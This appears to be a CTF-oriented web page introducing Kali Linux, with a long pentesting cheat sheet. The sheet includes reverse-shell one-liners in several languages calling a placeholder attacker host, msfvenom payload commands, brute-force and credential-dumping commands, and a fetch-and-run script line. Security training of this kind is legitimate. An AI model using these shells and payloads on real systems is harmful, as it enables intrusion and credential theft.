Kali Linux
The industry-standard penetration testing distribution. Everything you need to know to get started with Kali for CTF competitions and security research.
What Is Kali Linux?
Kali Linux is a Debian-based Linux distribution designed specifically for digital forensics, penetration testing, and security auditing. Maintained by Offensive Security, it comes pre-installed with over 600 security tools covering every phase of an engagement — from reconnaissance and enumeration to exploitation, post-exploitation, and reporting.
First released in 2013 as the successor to BackTrack Linux, Kali has become the de facto standard operating system for security professionals, ethical hackers, and CTF competitors worldwide. It is free, open source, and receives continuous updates.
Why Use Kali Linux?
600+ Pre-installed Tools
No need to manually install and configure individual tools. Kali bundles everything from
nmap and Burp Suite to Ghidra and John the Ripper right out of the box.Rolling Release Model
Kali follows a rolling release cycle, meaning tools and packages are continuously updated. You always have access to the latest versions without waiting for a major release.
Runs Anywhere
Install it on bare metal, run it in a VM (VMware, VirtualBox, Hyper-V), boot from USB, use the Docker image, or run it on a Raspberry Pi, WSL2, or cloud instances.
Massive Community
Extensive documentation, forums, training courses (OSCP, OSCE, OSWE), and a huge community of users sharing scripts, configurations, and knowledge.
CTF Ready
Most CTF writeups and walkthroughs assume a Kali environment. Having Kali means you can follow along with any guide without compatibility issues.
Where to Get Kali
Installer ISO
Full installer for bare-metal or VM installation. 64-bit recommended.
Pre-built VM
Ready-to-use images for VMware and VirtualBox. Just import and go.
ARM Images
For Raspberry Pi, Pinebook, and other ARM-based devices.
Docker
docker pull kalilinux/kali-rollingWSL2 (Windows)
Run Kali natively inside Windows via the Microsoft Store.
Cloud (AWS / Azure)
Deploy Kali in the cloud for remote engagements and on-demand labs.
Recommendation for beginners: Download the Pre-built VM for VirtualBox. It's the fastest way to get started — no installation required. Just import the
.ova file and boot up.Getting Started — First Steps
1
Update Everything
After first boot, always update your system:
sudo apt update && sudo apt full-upgrade -y2
Change the Default Password
Default credentials are
kali:kali. Change immediately:passwd3
Learn the Terminal
Most Kali tools are command-line based. Get comfortable with basic commands:
ls, cd, cat, grep, find, chmod, ssh, pipes (|), and redirection (>, >>).4
Explore the Tool Menu
Kali organizes tools by category in the application menu. Browse through Information Gathering, Vulnerability Analysis, Web Application Analysis, Password Attacks, etc. to see what's available.
5
Set Up Your Workspace
Create a working directory for CTFs:
mkdir ~/ctf. Keep challenge files organized per competition. Install any additional tools you like with sudo apt install <package>.6
Take Snapshots
If using a VM, take a snapshot of your clean, updated Kali. You can always roll back if something breaks during testing.
Essential Tools Reference
Nmap Recon
The gold standard for network scanning and port enumeration. Discovers open ports, running services, OS versions, and vulnerabilities.
nmap -sC -sV -oN scan.txt <target>Gobuster Recon
Brute-force directory and file discovery on web servers. Essential for finding hidden endpoints, admin panels, and backup files.
gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txtAmass Recon
Subdomain enumeration and external asset discovery. Maps attack surfaces by finding subdomains through DNS, scraping, and APIs.
amass enum -d example.comenum4linux Recon
Enumerates SMB shares, users, groups, and policies on Windows/Samba systems. Essential for Active Directory recon.
enum4linux -a <target>Burp Suite Web
The most widely used web application security testing platform. Intercepts and modifies HTTP traffic, crawls sites, and scans for vulnerabilities. The Community edition is included in Kali.
burpsuiteSQLmap Web
Automates detection and exploitation of SQL injection flaws. Supports MySQL, PostgreSQL, Oracle, MSSQL, SQLite, and more. Dumps databases, reads files, and gains OS shell access.
sqlmap -u "http://target/page?id=1" --dbsNikto Web
Web server scanner that checks for dangerous files, outdated software, misconfigurations, and common vulnerabilities across 7,000+ tests.
nikto -h http://targetWPScan Web
WordPress vulnerability scanner. Enumerates plugins, themes, users, and known CVEs specific to WordPress installations.
wpscan --url http://target --enumerate vp,vt,uMetasploit Framework Exploit
The world's most widely used penetration testing framework. Contains thousands of exploits, payloads, encoders, and post-exploitation modules for every platform.
msfconsoleSearchsploit Exploit
Offline mirror of Exploit-DB. Quickly search for known exploits by software name, version, or CVE — no internet needed.
searchsploit apache 2.4John the Ripper Password
Fast, versatile password cracker supporting hundreds of hash formats (MD5, SHA, NTLM, bcrypt, etc.). Great for cracking hashes found in CTF challenges.
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txtHashcat Password
GPU-accelerated password cracker. Supports rule-based attacks, mask attacks, and combination attacks. Significantly faster than CPU-based crackers on supported hardware.
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txtHydra Password
Online password brute-force tool. Attacks login pages over SSH, FTP, HTTP, SMB, RDP, and dozens of other protocols in parallel.
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://targetWireshark Network
The world's foremost network protocol analyzer. Capture and inspect live traffic or analyze pcap files from forensics challenges. Supports 3,000+ protocols.
wiresharkResponder Network
LLMNR/NBT-NS/MDNS poisoner and credential interceptor. Captures NTLMv2 hashes on the local network by answering broadcast name resolution queries.
sudo responder -I eth0Aircrack-ng Wireless
Complete suite for auditing wireless networks. Monitor, capture, and crack WEP/WPA/WPA2 handshakes. Includes airodump-ng, aireplay-ng, and related tools.
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.capVolatility Forensics
Memory forensics framework. Analyze RAM dumps to extract processes, network connections, registry hives, passwords, and malware artifacts.
vol.py -f memory.dmp --profile=Win7SP1x64 pslistBinwalk Forensics
Firmware analysis tool that scans binary files for embedded files, file signatures, and compressed archives. Indispensable for steganography and forensics CTF challenges.
binwalk -e suspicious_file.binSteghide Forensics
Steganography tool for hiding and extracting data within JPEG and BMP images. Common in stego-themed CTF challenges.
steghide extract -sf image.jpgGhidra Reverse
NSA's open-source reverse engineering suite. Decompiles binaries to C-like pseudocode. Supports x86, ARM, MIPS, and many more architectures. The free alternative to IDA Pro.
ghidraGDB + pwndbg Reverse
GNU Debugger enhanced with pwndbg/GEF for exploit development. Set breakpoints, inspect memory, trace execution, and develop buffer overflow exploits.
gdb -q ./binaryRadare2 Reverse
Advanced command-line reverse engineering framework. Disassembles, debugs, and patches binaries. Lightweight and scriptable.
r2 -A ./binaryCTF Tips for Kali Users
Unzip rockyou.txt
The famous password wordlist ships compressed. Unpack it before your first CTF:
sudo gunzip /usr/share/wordlists/rockyou.txt.gzInstall pwntools
The go-to Python library for binary exploitation CTFs. Handles connections, packing, ROP chains, and shellcode generation:
pip install pwntoolsInstall CyberChef Locally
CyberChef is a web-based data analysis tool perfect for quick encoding/decoding, XOR, Base64, and hash lookups. Run it offline for CTFs with no internet.
Keep Notes
Use a tool like CherryTree, Obsidian, or simple markdown files to document your approach for each challenge. Good notes help during the CTF and when writing writeups afterwards.
Network Your VM Properly
For CTFs that require VPN access (like HackTheBox or TryHackMe), make sure your Kali VM is set to NAT or Bridged networking, and import the
.ovpn file with: sudo openvpn ctf.ovpnLearn One-Liners
Master common reverse shells and enumeration one-liners. Keep a cheatsheet handy:
bash -i >& /dev/tcp/YOURIP/4444 0>&1python3 -c 'import pty;pty.spawn("/bin/bash")'Want to practice? Head to the Community Challenges section to try challenges created by other members, or visit Challenges to attempt the official ones!
Kali Linux Cheat Sheet
A comprehensive quick-reference for the commands and techniques you'll use most often in CTFs and penetration testing. Bookmark this page — it covers everything from basic Linux navigation to advanced exploitation one-liners.
Linux Fundamentals
| Command | Description |
|---|---|
pwd | Print current working directory |
ls -la | List all files including hidden, with permissions |
cd /path/to/dir | Change directory |
cp -r src dst | Copy files/directories recursively |
mv old new | Move or rename files |
rm -rf dir/ | Remove directory and contents recursively |
mkdir -p a/b/c | Create nested directories |
find / -name "*.txt" 2>/dev/null | Find files by name, suppress errors |
find / -perm -4000 2>/dev/null | Find SUID binaries (privesc) |
locate filename | Fast file search using database (run updatedb first) |
which nmap | Show full path of a command |
cat file.txt | Display file contents |
head -n 20 file | Show first 20 lines |
tail -f /var/log/syslog | Follow log output in real-time |
less file.txt | Paginated file viewer (q to quit) |
grep -rni "password" . | Recursive case-insensitive search with line numbers |
grep -E "user|pass|token" file | Search for multiple patterns (regex) |
sort file | uniq -c | sort -rn | Count unique lines, sorted by frequency |
wc -l file.txt | Count lines in a file |
diff file1 file2 | Compare two files line by line |
awk '{print $1}' file | Print first column of each line |
sed 's/old/new/g' file | Find and replace text in file |
cut -d':' -f1 /etc/passwd | Extract first field (usernames) |
tr 'A-Z' 'a-z' < file | Convert uppercase to lowercase |
xargs -I{} command {} | Pass stdin as arguments to command |
Permissions & Users
| Command | Description |
|---|---|
chmod 755 file | Set rwxr-xr-x permissions |
chmod +x script.sh | Make file executable |
chmod u+s binary | Set SUID bit on binary |
chown user:group file | Change file owner and group |
whoami | Current username |
id | Show UID, GID, and group memberships |
sudo -l | List commands current user can sudo (privesc check) |
cat /etc/passwd | List all system users |
cat /etc/shadow | Password hashes (requires root) |
cat /etc/group | List all groups |
getent passwd | List users (including LDAP/NIS) |
w | Show who is logged in and what they're doing |
last | Show last logins |
Networking
| Command | Description |
|---|---|
ip a | Show all network interfaces and IPs |
ip route | Show routing table |
ss -tulnp | Show listening ports with process info |
netstat -antup | Active connections with PIDs |
ping -c 3 target | Send 3 ICMP echo requests |
traceroute target | Trace packet route to target |
dig example.com ANY | DNS lookup — all record types |
dig @ns axfr example.com | Attempt DNS zone transfer |
host -t mx example.com | Lookup MX records |
whois example.com | WHOIS registration lookup |
curl -sv https://target | HTTP request with verbose headers |
curl -X POST -d 'data' url | Send POST request with data |
wget -r -np http://target/dir/ | Recursively download directory |
nc -lvnp 4444 | Start netcat listener on port 4444 |
nc target 80 | Connect to target on port 80 |
socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash | Bind shell with socat |
arp-scan -l | Discover hosts on local network |
tcpdump -i eth0 -w capture.pcap | Capture network traffic to file |
ssh -L 8080:127.0.0.1:80 user@target | Local port forward (tunnel) |
ssh -D 9050 user@target | Dynamic SOCKS proxy via SSH |
sshuttle -r user@target 10.10.10.0/24 | VPN-like tunnel through SSH |
proxychains nmap target | Run nmap through proxy chain |
Nmap Scanning
| Command | Description |
|---|---|
nmap -sn 10.10.10.0/24 | Ping sweep — discover live hosts |
nmap -sC -sV -oA scan target | Default scripts + version detection, save all formats |
nmap -p- target | Scan all 65535 TCP ports |
nmap -sU -top-ports 100 target | UDP scan — top 100 ports |
nmap -sS -T4 -Pn target | SYN stealth scan, fast, skip ping |
nmap -O target | OS detection |
nmap --script vuln target | Run all vulnerability detection scripts |
nmap --script smb-enum-shares target | Enumerate SMB shares |
nmap --script http-enum target | Enumerate web directories/files |
nmap -sV --script=banner target | Grab service banners |
nmap -p 445 --script smb-vuln* target | Check for SMB vulnerabilities (EternalBlue, etc.) |
Web Application Testing
| Command | Description |
|---|---|
gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt -x php,html,txt | Directory brute-force with file extensions |
gobuster dns -d target.com -w subdomains.txt | Subdomain brute-force |
gobuster vhost -u http://target -w vhosts.txt | Virtual host discovery |
ffuf -u http://target/FUZZ -w wordlist.txt -mc 200,301 | Fast web fuzzer with status code filter |
ffuf -u http://target -H "Host: FUZZ.target" -w subs.txt -fs 0 | Subdomain fuzzing via Host header |
feroxbuster -u http://target -w wordlist.txt -x php -d 2 | Recursive directory brute-force (depth 2) |
dirb http://target /usr/share/dirb/wordlists/big.txt | Classic directory scanner |
wfuzz -c -z file,wordlist.txt --hc 404 http://target/FUZZ | Web fuzzer with 404 filtering |
nikto -h http://target -o report.html -Format html | Web server scan with HTML report |
whatweb http://target | Identify web technologies, CMS, frameworks |
wafw00f http://target | Detect Web Application Firewall (WAF) |
sqlmap -u "http://target/page?id=1" --dbs --batch | Auto SQL injection — enumerate databases |
sqlmap -u "url" -D dbname --tables | List tables in a database |
sqlmap -u "url" -D db -T table --dump | Dump table contents |
sqlmap -u "url" --os-shell | Attempt OS shell via SQL injection |
sqlmap -r request.txt --batch | SQL injection from saved Burp request |
commix -u "http://target/page?cmd=test" | Automated command injection testing |
xsser -u "http://target/search?q=test" | Automated XSS detection |
Password Attacks
| Command | Description |
|---|---|
john --wordlist=rockyou.txt hash.txt | Crack hashes with John + wordlist |
john --show hash.txt | Show cracked passwords |
john --format=raw-md5 hash.txt | Specify hash format explicitly |
unshadow passwd shadow > unshadowed.txt | Combine passwd + shadow for John |
hashcat -m 0 hash.txt rockyou.txt | MD5 — mode 0 |
hashcat -m 100 hash.txt rockyou.txt | SHA1 — mode 100 |
hashcat -m 1000 hash.txt rockyou.txt | NTLM — mode 1000 |
hashcat -m 1800 hash.txt rockyou.txt | sha512crypt ($6$) — mode 1800 |
hashcat -m 3200 hash.txt rockyou.txt | bcrypt — mode 3200 |
hashcat -m 13100 hash.txt rockyou.txt | Kerberoast (TGS-REP) — mode 13100 |
hashcat -m 5600 hash.txt rockyou.txt | NTLMv2 — mode 5600 |
hashcat -a 3 -m 0 hash.txt ?a?a?a?a?a?a | Brute-force mask attack (6 chars) |
hydra -l admin -P rockyou.txt ssh://target | Brute-force SSH login |
hydra -l admin -P rockyou.txt target http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect" | Brute-force web login form |
hydra -L users.txt -P pass.txt ftp://target | FTP brute-force with user + pass lists |
hydra -l admin -P rockyou.txt rdp://target | RDP brute-force |
hydra -l sa -P rockyou.txt target mssql | MSSQL brute-force |
cewl http://target -d 3 -w custom_wordlist.txt | Generate wordlist from website content |
crunch 6 8 abc123 -o wordlist.txt | Generate custom wordlist (6-8 chars) |
hash-identifier | Identify hash type interactively |
hashid hash_value | Identify hash type from value |
Reverse Shells & Payloads
| Command | Description |
|---|---|
bash -i >& /dev/tcp/YOURIP/4444 0>&1 | Bash reverse shell |
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("YOURIP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])' | Python reverse shell |
php -r '$sock=fsockopen("YOURIP",4444);exec("/bin/sh -i <&3 >&3 2>&3");' | PHP reverse shell |
nc -e /bin/bash YOURIP 4444 | Netcat reverse shell (traditional) |
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOURIP 4444 >/tmp/f | Netcat reverse shell (no -e) |
perl -e 'use Socket;$i="YOURIP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");' | Perl reverse shell |
ruby -rsocket -e'f=TCPSocket.open("YOURIP",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' | Ruby reverse shell |
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$c=New-Object System.Net.Sockets.TCPClient('YOURIP',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$s.Write(([text.encoding]::ASCII.GetBytes($r)),0,$r.Length)}" | PowerShell reverse shell |
python3 -c 'import pty;pty.spawn("/bin/bash")' then Ctrl+Z → stty raw -echo;fg → export TERM=xterm | Upgrade to full TTY |
MSFvenom Payloads
| Command | Description |
|---|---|
msfvenom -p linux/x64/shell_reverse_tcp LHOST=YOURIP LPORT=4444 -f elf -o rev.elf | Linux ELF reverse shell |
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=YOURIP LPORT=4444 -f elf -o met.elf | Linux Meterpreter |
msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOURIP LPORT=4444 -f exe -o rev.exe | Windows EXE reverse shell |
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=YOURIP LPORT=4444 -f exe -o met.exe | Windows Meterpreter |
msfvenom -p php/reverse_php LHOST=YOURIP LPORT=4444 -f raw -o shell.php | PHP reverse shell |
msfvenom -p java/jsp_shell_reverse_tcp LHOST=YOURIP LPORT=4444 -f raw -o shell.jsp | JSP reverse shell |
msfvenom -p java/jsp_shell_reverse_tcp LHOST=YOURIP LPORT=4444 -f war -o shell.war | WAR reverse shell |
msfvenom -p cmd/unix/reverse_python LHOST=YOURIP LPORT=4444 -f raw | Python reverse shell payload |
msfvenom -p windows/shell_reverse_tcp LHOST=YOURIP LPORT=4444 -f asp -o shell.asp | ASP reverse shell |
Metasploit Framework
| Command | Description |
|---|---|
msfconsole | Launch Metasploit |
search type:exploit name:smb | Search for SMB exploits |
use exploit/windows/smb/ms17_010_eternalblue | Select a module |
show options | Display required/optional settings |
set RHOSTS target | Set target host |
set LHOST yourip | Set listener IP |
set PAYLOAD windows/x64/meterpreter/reverse_tcp | Set payload |
exploit / run | Execute the exploit |
sessions -l | List active sessions |
sessions -i 1 | Interact with session 1 |
background | Background current session |
use post/multi/recon/local_exploit_suggester | Suggest local privilege escalation exploits |
Linux Privilege Escalation
| Command | Description |
|---|---|
sudo -l | Check sudo permissions (first thing to check!) |
find / -perm -4000 2>/dev/null | Find SUID binaries |
find / -perm -2000 2>/dev/null | Find SGID binaries |
find / -writable 2>/dev/null | grep -v proc | Find world-writable files |
getcap -r / 2>/dev/null | Find binaries with capabilities |
cat /etc/crontab | Check cron jobs |
ls -la /etc/cron* | List all cron directories |
systemctl list-timers | List active systemd timers |
cat /etc/exports | Check NFS shares (no_root_squash → root) |
env | Check environment variables for secrets |
cat /proc/version | Kernel version (check for kernel exploits) |
uname -a | System info — kernel, architecture |
ls -la /home/ | Check other users' home directories |
history | Check command history for credentials |
cat ~/.bash_history | Read bash history file |
find / -name "*.bak" -o -name "*.old" -o -name "*.conf" 2>/dev/null | Find config/backup files |
ls -la /opt/ /var/backups/ /tmp/ | Check common directories for interesting files |
wget http://YOURIP/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh | Download and run LinPEAS (automated privesc scanner) |
Windows Privilege Escalation
| Command | Description |
|---|---|
whoami /all | Current user, groups, privileges |
systeminfo | OS version, hotfixes, architecture |
net user | List local users |
net localgroup administrators | List admin group members |
cmdkey /list | Stored credentials |
reg query HKLM /f password /t REG_SZ /s | Search registry for passwords |
schtasks /query /fo LIST /v | List scheduled tasks (verbose) |
wmic service list brief | List services |
sc qc ServiceName | Query service config (unquoted paths?) |
icacls "C:\path\to\service.exe" | Check file permissions |
netstat -ano | Active connections with PIDs |
dir /s /b C:\*.txt C:\*.ini C:\*.cfg 2>nul | Search for config files |
type C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt | PowerShell history |
winPEASx64.exe | Automated Windows privesc scanner |
SMB & Active Directory
| Command | Description |
|---|---|
smbclient -L //target -N | List SMB shares (null session) |
smbclient //target/share -U user | Connect to SMB share |
smbmap -H target | Enumerate share permissions |
smbmap -H target -u user -p pass -r share | Recursively list share contents |
crackmapexec smb target -u user -p pass | Validate credentials against SMB |
crackmapexec smb target -u user -p pass --shares | List shares with credentials |
crackmapexec smb target -u user -p pass -M spider_plus | Spider all shares for files |
enum4linux -a target | Full SMB/RPC enumeration |
rpcclient -U '' -N target | Null session RPC connection |
impacket-GetNPUsers domain/ -usersfile users.txt -dc-ip DC | AS-REP Roast — get hashes without pre-auth |
impacket-GetUserSPNs domain/user:pass -dc-ip DC -request | Kerberoast — request TGS tickets |
impacket-secretsdump domain/user:pass@target | Dump SAM / NTDS.dit hashes |
impacket-psexec domain/user:pass@target | Remote shell via SMB (admin required) |
impacket-wmiexec domain/user:pass@target | Remote shell via WMI |
evil-winrm -i target -u user -p pass | WinRM shell (port 5985) |
bloodhound-python -c all -u user -p pass -d domain -ns DC | Collect AD data for BloodHound |
File Transfers
| Command | Description |
|---|---|
python3 -m http.server 8080 | Start Python HTTP server |
wget http://YOURIP:8080/file -O /tmp/file | Download file with wget (Linux) |
curl http://YOURIP:8080/file -o /tmp/file | Download file with curl (Linux) |
nc -lvnp 4444 < file → nc YOURIP 4444 > file | Transfer via Netcat (sender → receiver) |
Invoke-WebRequest -Uri http://YOURIP:8080/file -OutFile C:\temp\file | PowerShell download |
iwr http://YOURIP:8080/file -o C:\temp\file | PowerShell download (short alias) |
certutil -urlcache -split -f http://YOURIP:8080/file C:\temp\file | Certutil download (Windows) |
scp file user@target:/tmp/file | Secure copy via SSH |
base64 file > encoded.txt → base64 -d encoded.txt > file | Base64 encode/decode transfer |
impacket-smbserver share . -smb2support → copy \\YOURIP\share\file . | SMB server via Impacket |
Forensics & Steganography
| Command | Description |
|---|---|
file mystery_file | Identify file type from magic bytes |
strings -n 8 file | Extract printable strings (min 8 chars) |
strings -e l file | Extract 16-bit little-endian strings |
xxd file | head -50 | Hex dump — first 50 lines |
hexdump -C file | head | Hex + ASCII dump |
binwalk file | Scan for embedded files/signatures |
binwalk -e file | Extract embedded files |
binwalk --dd=".*" file | Force extract all detected types |
foremost -i file -o output/ | Carve files from binary data |
steghide info image.jpg | Check if image has hidden data |
steghide extract -sf image.jpg | Extract hidden data from image |
stegseek image.jpg rockyou.txt | Brute-force steghide password |
zsteg image.png | Detect stego in PNG/BMP (LSB, etc.) |
exiftool image.jpg | Read/write metadata (EXIF, GPS, etc.) |
pngcheck -v image.png | Validate PNG structure, check for errors |
identify -verbose image.png | ImageMagick — detailed image info |
photorec image.dd | Recover files from disk image |
volatility -f mem.dmp imageinfo | Identify memory dump profile |
volatility -f mem.dmp --profile=X pslist | List processes from memory |
volatility -f mem.dmp --profile=X filescan | Scan for file objects in memory |
volatility -f mem.dmp --profile=X hashdump | Extract password hashes from memory |
Reverse Engineering
| Command | Description |
|---|---|
objdump -d binary | Disassemble binary |
objdump -x binary | Display all headers |
readelf -a binary | ELF header info (sections, symbols) |
nm binary | List symbols |
ldd binary | List shared library dependencies |
ltrace ./binary | Trace library calls |
strace ./binary | Trace system calls |
gdb -q ./binary | Start GDB in quiet mode |
gdb: break main | Set breakpoint at main() |
gdb: run | Run the program |
gdb: disas main | Disassemble main function |
gdb: x/20wx $esp | Examine 20 words at stack pointer |
gdb: info registers | Show all register values |
gdb: set {int}0xaddr = value | Write value to memory address |
gdb: pattern create 200 | Generate cyclic pattern (pwndbg/GEF) |
gdb: pattern offset $eip | Find offset to EIP overwrite |
r2 -A ./binary | Radare2 — open with analysis |
r2: afl | List functions |
r2: pdf @main | Disassemble main |
r2: VV @main | Visual graph mode |
checksec ./binary | Check binary protections (NX, PIE, canary, RELRO) |
ROPgadget --binary ./binary | Find ROP gadgets |
one_gadget /lib/x86_64-linux-gnu/libc.so.6 | Find one-shot execve gadgets in libc |
Cryptography
| Command | Description |
|---|---|
echo -n "text" | md5sum | MD5 hash |
echo -n "text" | sha256sum | SHA-256 hash |
echo -n "text" | base64 | Base64 encode |
echo "dGV4dA==" | base64 -d | Base64 decode |
echo -n "text" | xxd -p | Convert to hex |
echo "74657874" | xxd -r -p | Convert hex to ASCII |
openssl enc -aes-256-cbc -d -in file.enc -out file.dec | Decrypt AES-256-CBC file |
openssl rsautl -decrypt -inkey priv.pem -in encrypted -out decrypted | RSA decrypt with private key |
openssl rsa -in key.pem -text -noout | Display RSA key details (n, e, d, p, q) |
openssl x509 -in cert.pem -text -noout | Read X.509 certificate details |
gpg -d encrypted.gpg | Decrypt GPG file |
gpg --import key.asc | Import GPG key |
python3 -c "from Crypto.Util.number import *; print(long_to_bytes(0x48656c6c6f))" | Hex integer to bytes (pycryptodome) |
python3 -c "print(int.from_bytes(b'Hello','big'))" | Bytes to integer |
rsactftool.py --publickey pub.pem --private | Attempt RSA key factoring (RsaCtfTool) |
Pivoting & Tunneling
| Command | Description |
|---|---|
ssh -L 8080:internal:80 user@pivot | Local port forward — access internal:80 via localhost:8080 |
ssh -R 8080:localhost:80 user@pivot | Remote port forward — expose your port 80 on pivot:8080 |
ssh -D 9050 user@pivot | SOCKS proxy on port 9050 |
sshuttle -r user@pivot 10.10.10.0/24 | Transparent tunnel to subnet |
chisel server -p 8000 --reverse | Start chisel server (on attacker) |
chisel client YOURIP:8000 R:8080:127.0.0.1:80 | Chisel reverse port forward (on target) |
chisel client YOURIP:8000 R:socks | Chisel reverse SOCKS proxy |
ligolo-ng agent -connect YOURIP:11601 -retry -ignore-cert | Ligolo agent on target |
proxychains -q nmap -sT target | Nmap through SOCKS proxy (TCP connect only) |
socat TCP-LISTEN:8080,fork TCP:internal:80 | Simple port forward with socat |
Useful One-Liners
| Command | Description |
|---|---|
python3 -c 'import pty;pty.spawn("/bin/bash")' | Spawn TTY shell |
Ctrl+Z → stty raw -echo;fg → reset → export TERM=xterm → stty rows 40 cols 160 | Upgrade to full interactive shell |
python3 -m http.server 80 | Simple web server |
ssh-keygen -t rsa -b 4096 -f id_rsa | Generate SSH key |
for p in $(seq 1 65535); do (echo >/dev/tcp/target/$p) 2>/dev/null && echo "$p open"; done | Port scan without nmap |
for i in $(seq 1 254); do (ping -c 1 10.10.10.$i | grep "bytes from" &); done | Ping sweep without nmap |
sudo gunzip /usr/share/wordlists/rockyou.txt.gz | Extract rockyou wordlist |
date -d @1609459200 | Convert epoch timestamp |
python3 -c "import urllib.parse;print(urllib.parse.quote('string'))" | URL encode a string |
python3 -c "import urllib.parse;print(urllib.parse.unquote('%73%74%72'))" | URL decode a string |
echo "text" | tr 'A-Za-z' 'N-ZA-Mn-za-m' | ROT13 encode/decode |
md5sum file && sha1sum file && sha256sum file | Quick checksum (MD5, SHA1, SHA256) |
watch -n 1 'ls -la /tmp' | Watch directory for changes |
base64 -w 0 binary > b64.txt → base64 -d b64.txt > binary | Base64 file transfer |
Bookmark this page! This cheat sheet covers the most common commands you'll need during CTF competitions. For tool-specific documentation, check the Essential Tools section above or visit each tool's official documentation.